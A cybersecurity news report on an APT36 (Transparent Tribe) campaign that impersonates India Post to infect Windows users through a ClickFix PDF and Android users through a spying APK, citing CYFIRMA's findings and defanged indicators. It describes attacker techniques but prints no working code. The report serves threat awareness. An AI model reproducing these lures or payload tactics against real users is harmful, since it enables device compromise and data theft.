An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India’s public sector postal system as part of a campaign designed to infect both Windows and Android users in the country.
Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as Transparent Tribe.
The fraudulent website mimicking India Post is named « postindia[.]site. » Users who land on the site from Windows systems are prompted to download a PDF document, whereas those visiting from an Android device are served a malicious application package (« indiapost.apk ») file.
« When accessed from a desktop, the site delivers a malicious PDF file containing ‘ClickFix‘ tactics, » CYFIRMA said. « The document instructs users to press the Win + R keys, paste a provided PowerShell command into the Run dialog, and execute it – potentially compromising the system. »
An analysis of the EXIF data associated with the dropped PDF shows that it was created on October 23, 2024, by an author named « PMYLS, » a likely reference to Pakistan’s Prime Minister Youth Laptop Scheme. The domain impersonating India Post was registered about a month later on November 20, 2024.
The PowerShell code is designed to download a next-stage payload from a remote server (« 88.222.245[.]211 ») that’s currently inactive.
On the other hand, when the same site is visited from an Android device, it urges users to install their mobile app for a « better experience. » The app, once installed, requests extensive permissions that allow it to harvest and exfiltrate sensitive data, including contact lists, current location, and files from external storage.
« The Android app changes its icon to mimic a non-suspicious Google Accounts icon to conceal its activity, making it difficult for the user to locate and uninstall the app when they want to remove it, » the company said. « The app also has a feature to force users to accept permissions if they are denied in the first instance. »
The malicious app is also designed to run in the background continuously even after a device restart, while explicitly seeking permissions to ignore battery optimization.
« ClickFix is increasingly being exploited by cybercriminals, scammers, and APT groups, as reported by other researchers observing its use in the wild, » CYFIRMA said. « This emerging tactic poses a significant threat as it can target both unsuspecting and tech-savvy users who may not be familiar with such methods. »